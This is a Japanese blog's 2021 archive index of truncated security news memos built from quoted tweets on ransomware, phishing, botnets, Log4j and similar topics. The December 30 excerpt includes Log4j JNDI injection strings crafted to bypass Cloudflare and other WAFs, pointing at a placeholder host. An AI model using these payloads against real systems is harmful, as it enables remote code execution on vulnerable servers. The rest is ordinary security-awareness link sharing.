2021-01-01から1年間の記事一覧

2021/12/30 セキュリティ関連Twitterメモ

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass…

2021/12/12 セキュリティ関連Twitterメモ

I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: h…

2021/12/5 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK — キタきつね (@foxbook) Nov 23, 2021 メールで #P…

2021/11/23 セキュリティ関連Twitterメモ

プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|NHK NEWS WEB https://t.co/cIzvxfwdXl — piyokango (@piyokango) Nov 9, 2021 セキュリティハイプサイクル(日本語)が出てます。(カタカナ率高いのがアレですが・・…

2021/11/9 セキュリティ関連Twitterメモ

WordPress のセキュリティ対策についてしゃべりました! https://t.co/lEx7FKK4TE #wpmeetupkyoto — ym (@ym405nm) Nov 1, 2021 KDDIセキュリティ(au)を騙り偽apkをダウンロードさせる手口のフィッシングメール(SMS)を観測しました。 hivhtwyfaa[.]duckd…

2021/11/1 セキュリティ関連Twitterメモ

面白い基調講演だった。色んな人に伝えていくことも我々の責務ですね #DevelopersIO [レポート]基調講演1:「サイバーセキュリティの万華鏡を揺らす ? 人間行動とサイバーセキュリティへの没入型調査」 ? CODE BLUE 2021 #codeblue_jp https://t.co/XaUdEm9d…

2021/10/18 セキュリティ関連Twitterメモ

弊社、実はひっそりとエンジニアブログを始めてました! 導入編では、サイバー脅威インテリジェンスとは何か?からどんな環境を準備すればいいのかを紹介してます。 今日からできるサイバー脅威インテリジェンスの話-導入編- - NFLabs. エンジニアブログ htt…

2021/10/3 セキュリティ関連Twitterメモ

Meris botnet について、MikroTik のコメント。新しい脆弱性があるというわけではないらしい。2018年の Chimay Red 脆弱性 (Hajime が悪用してたやつ) のパッチ適用前にパスワードぬかれてて、変更してないんじゃないかとのこと。 M?ris botnet information …

2021/9/15 セキュリティ関連Twitterメモ

https://t.co/6obTV4sFXR — Neutral8?9eR (@0x009AD6_810) Aug 24, 2021 IIJ のハニーポットでも Realtek SDK の管理インタフェースの脆弱性を狙う攻撃を 8/22 から観測しています。複数の攻撃者による Mirai 亜種の感染試行で、formWsc と formSysCmd への…

2021/8/23 セキュリティ関連Twitterメモ

東京オリンピックのサイバー関連の出来事についてまとめてみた - piyolog https://t.co/iS3RYvNlXE — にゃん☆たく (@taku888infinity) Aug 9, 2021 企業がランサムウェア攻撃を受けた時にすべきこと | TECH+ https://t.co/qYWlVeoI5Q — にゃん☆たく (@taku88…

2021/8/8 セキュリティ関連Twitterメモ

サイバー攻撃対策ツール23選比較!選び方や導入時の注意点も解説 | マイナビニュース https://t.co/cffXxaE4t5 #にゃんたくメモ — にゃん☆たく (@taku888infinity) Aug 2, 2021 CORSがなぜこうなっているのかの推測。私の動画も見ていただければ。この記事に…

2021/7/17 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本のサイバー能力は落第点 - Fox on Security https://t.co/Z8dWrneclo — キタきつね (@foxbook) Jun 29, 2021 米マイクロソフト、新たな情報漏えいで顧客に警告 | ロイター https…

2021/6/30 セキュリティ関連Twitterメモ

Process Ghosting: https://t.co/NQ1Uun9YYg 新しいアンチウィルス回避テクニックについて。ネーミングが格好良い。 — 白船 (田中ザック) (@yamatosecurity) Jun 15, 2021 富士通株式会社が管理・運営するプロジェクト情報共有ツールへの不正アクセスによる…

2021/6/16 セキュリティ関連Twitterメモ

2021年6月7日 株式会社東芝 「東芝グループ サイバーセキュリティ報告書2021」の発行について https://t.co/o8WWRzrvVV https://t.co/JsCXzP4327 — Autumn Good (@autumn_good_35) Jun 7, 2021 ブログ書きました。 本場のWordPressプラグインのSQLインジ…

2021/6/6 セキュリティ関連Twitterメモ

中国、TikTokなど105アプリが「個人情報を違法収集」 当局が改善求める https://t.co/6vzYMtOTxm習近平指導部は中国IT企業への締め付けを強めており、そうした取り組みの一環となる。 — 産経ニュース (@Sankei_news) May 22, 2021 おっと初耳だぞ…

2021/5/23 セキュリティ関連Twitterメモ

#セキュリティのアレ 第85回 https://t.co/ZdFBYyD78m でActive Directory Federation Service /M365 環境での侵害について触れられていましたが、ADFS利用環境でのセキュリティベストプラクティスはこのまとめをご参照に https://t.co/nrvGUUvTCK — Yurika …

2021/5/5 セキュリティ関連Twitterメモ

PDFサイバー攻撃手法一覧、28ビューアの安全性点検 https://t.co/Ww7whHYwco — ScanNetSecurity (@ScanNetSecurity) April 23, 2021 第二段つーかどこまで調べてるんだこの人…(恐 https://t.co/miC3TS0Z4t — hiro_ (@papa_anniekey) April 23, 2021 AirDrop…

2021/4/24 セキュリティ関連Twitterメモ

最近観測されている、不審メールってこんな流れでしょうか…… pic.twitter.com/wFtISG1Uny — abel (@abel1ma) April 11, 2021 パロアルトネットワークス、「Prisma Access 2.0」を提供開始 https://t.co/VkSmC76xGp https://t.co/NvXuDHyNkT — セキュリティ・…

2021/4/10 セキュリティ関連Twitterメモ

“年収2000万円も”防衛省がサイバーセキュリティのプロを募集|TBS NEWS https://t.co/AFjyc5Gl9R — セキュリティ猫 (@nekochanSec555) April 5, 2021 セキュリティに関連する情報は鮮度が命。「piyolog」の“中の人”piyokangoさんのブログの書き方【エン…

2021/4/5 セキュリティ関連Twitterメモ

今週の収録メモですよ #セキュリティのアレ?? Hot off the press: “今週の気になるセキュリティニュース - Issue #8” https://t.co/WfhegTIFVv (via @revue) — Masafumi Negishi (@MasafumiNegishi) March 28, 2021 https://t.co/eubHhdDxQQ#secure旅団 Podc…

2021/3/27 セキュリティ関連Twitterメモ

「企業における営業秘密管理に関する実態調査2020」報告書について:IPA 独立行政法人 情報処理推進機構 2021年3月18日https://t.co/Xp5dEJp4Lt — piyokango (@piyokango) March 18, 2021 自治体、LINE利用を相次ぎ停止 千葉県や大阪市など:朝日新聞デジタ…

2021/3/19 セキュリティ関連Twitterメモ

ここ最近、ブラウザのプッシュ通知を悪用して偽のセキュリティ警告を表示し、その警告をクリックしたユーザを、フィッシングサイトや不正ファイルのダウンロードサイトへ誘導するケースが多く観測されています。Webブラウジング中にウィルス警告が表示された…

2021/3/7 セキュリティ関連Twitterメモ

前回の検証の続きで、サービスとして登録されたプログラムが他のプロセスを起動したときの調査方法に関する検証を書きました。珍しく頑張った内容です。これでみんなイベントログを有効にしてくれれば、楽に調査が・・・イエ、より有効な調査ができると思い…

2021/2/20 セキュリティ関連Twitterメモ

CyberChefのTips集。あとでゆっくり見てみよう。"CyberChef のオペレーションめも - setodaNote" https://t.co/bx45CUCQ9B — fatsheep白 (@f47sh33p) February 7, 2021 Android関連のレポート読んでみたいなSecurity Researchers Received More Than $6.7 MI…

2021/2/8 セキュリティ関連Twitterメモ

プログラミング言語Perlが公式サイトのドメインをランサムウェア配布サイトに乗っ取られる - GIGAZINE https://t.co/3nYtQ6y9BF — piyokango (@piyokango) February 1, 2021 いやーまだまだありそう。心当たりの会社さんはすぐ確認を。厄介なのは直接のSales…

2021/1/31 セキュリティ関連Twitterメモ

Radware が年末年始に観測した、Bitcoin で身代金を要求する DDoS 攻撃活動について報告。昨夏に被害を受けた組織が再びターゲットになっている。攻撃は 9時間以上継続し、最大 237 Gbps を観測とのこと。Ransom DDoS Campaign: Circling Backhttps://t.co/a…

2021/1/24 セキュリティ関連Twitterメモ

情報収集は自分が処理できる範囲の情報を集めるようにしないと、何をやっても浅くなりがちで効率が悪いです。なるべく早く自分が興味を持って追求できる分野を見つけて、その分野の情報を優先的に集める能力が身につくと、技術者として効率よく成長できると…

2021/1/17 セキュリティ関連Twitterメモ

2021.1.7開発者コラム(4) | DNPハイパーテック不正改造アプリ対策のための署名認証セキュリティ強化とはhttps://t.co/jo4Ynfjq6B — Autumn Good (@autumn_good_35) January 8, 2021 トヨクモ、メールアドレスなど最大1948件流出 外部サーバー設定の検証…

2021/1/10 セキュリティ関連Twitterメモ

アセンブリで書かれたRC4は見た瞬間分かるか - yasulib memo https://t.co/hr8u1fsCIb #yamasec で話題が上がったマルウェア解析者はすぐRC4と理解できるのかというお話 — kataware (@_ktwr) January 3, 2021 #secure旅団 #情報収集 #忙しい人あけましておめ…

2021/1/3 セキュリティ関連Twitterメモ

脅威アクターのベンダ別呼称まとめ(超大作) https://t.co/uqpDFg20wo — b4ixu3 (@b4ixu3) December 25, 2020 楽天で最大148万件の顧客情報が流出か、セールスフォースのシステム設定を誤る https://t.co/WvTKzohhVC — piyokango (@piyokango) December 25,…